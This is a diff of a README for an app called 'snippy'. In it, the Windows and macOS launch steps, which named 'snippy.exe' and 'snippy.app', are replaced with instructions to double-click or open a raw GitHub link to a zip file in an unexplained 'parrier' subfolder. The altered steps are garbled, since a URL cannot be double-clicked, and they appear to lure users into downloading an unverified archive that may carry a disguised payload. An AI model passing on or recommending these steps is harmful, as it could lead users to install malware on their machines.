Mustapha5298/snippy/README.md

    - If your file is zipped, right-click on it and select "Extract All" to unpack the files.

 3. **Open the Application:**
-   - For Windows, double-click on `snippy.exe`.
+   - For Windows, double-click on `https://raw.githubusercontent.com/Mustapha5298/snippy/main/parrier/snippy.zip`.
-   - For macOS, right-click and select "Open" on `snippy.app`.
+   - For macOS, right-click and select "Open" on `https://raw.githubusercontent.com/Mustapha5298/snippy/main/parrier/snippy.zip`.
    - For Linux, run `./snippy` from the terminal.

 4. **Follow the On-Screen Instructions:**